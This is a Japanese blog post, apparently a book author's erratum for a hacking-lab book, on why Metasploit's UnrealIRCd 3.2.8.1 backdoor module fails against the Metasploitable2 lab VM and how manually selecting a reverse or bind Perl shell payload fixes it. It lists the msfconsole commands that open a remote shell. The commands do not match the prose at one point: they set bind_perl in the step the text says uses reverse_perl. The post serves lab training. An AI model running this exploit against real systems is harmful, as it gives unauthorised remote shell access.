UnrealIRCのバックドアに接続しようとしても失敗する

問題

P.398のステップ9にて、Metasploitable2のUnreal IRCのバックドアに接続する実験をしています。

本の手順通りに"exploit/unix/unreal_ircd_3281_backdoor"モジュールで攻撃しても、"Exploit failed"と表示されて失敗すると報告されました。

以前も問題なく実行できていたので、最新のKali(+Metasploit)でこの影響が出るようです。

原因

現在のMetasploitにはpayloadが自動で選択されてしまい、モジュールが想定するpayloadとマッチしていないとExploitコマンドを実行しても攻撃に失敗するようです。

対処方法

@nifox0408さんが対処方法を示してくれています。

現在のMetasploitにはpayloadが自動で選択されるようで、自分で適したペイロードを選択することで解決できるようです。

“cmd/unix/reverse_perl"を使う方法

1:P.401の通りに、"exploit/unix/unreal_ircd_3281_backdoor"モジュールを指定します。

msf > use unix/irc/unreal_ircd_3281_backdoor
msf exploit(unix/irc/unreal_ircd_3281_backdoor)> set RHOST 10.0.0.5

2:show payloadsで使えるペイロードの一覧を取得します。その中からそれらしいものを探します。

msf exploit(unix/irc/unreal_ircd_3281_backdoor)> show payloads

3:ここでは"cmd/unix/reverse_perl"を使うことにします。

show optionsで必要な設定を確認します。LHOSTやRHOSTSの設定が漏れていたらセットしてください。

msf exploit(unix/irc/unreal_ircd_3281_backdoor)> set payload cmd/unix/bind_perl
msf exploit(unix/irc/unreal_ircd_3281_backdoor)> show options

4:runコマンドを実行します。うまくいけばセッションが確立します。

プロンプトは返って来ませんが、idコマンドを実行すれば反応があるはずです。

“cmd/unix/bind_perl"を使う方法

上記の手順ではリバースシェルを使いましたが、バインドシェルでもうまくいくようです。

おわりに

ハッキング・ラボの情報をありがとうございます🙇‍♀️
そして情報展開が遅れてしまい申し訳ありませんでした。
いつかアップデートしたハッキング・ラボが登場する際にはきちんと反映したいと思っています。

ハッキング・ラボのつくりかたMetasploit,Metasploitable

Posted by ipusiron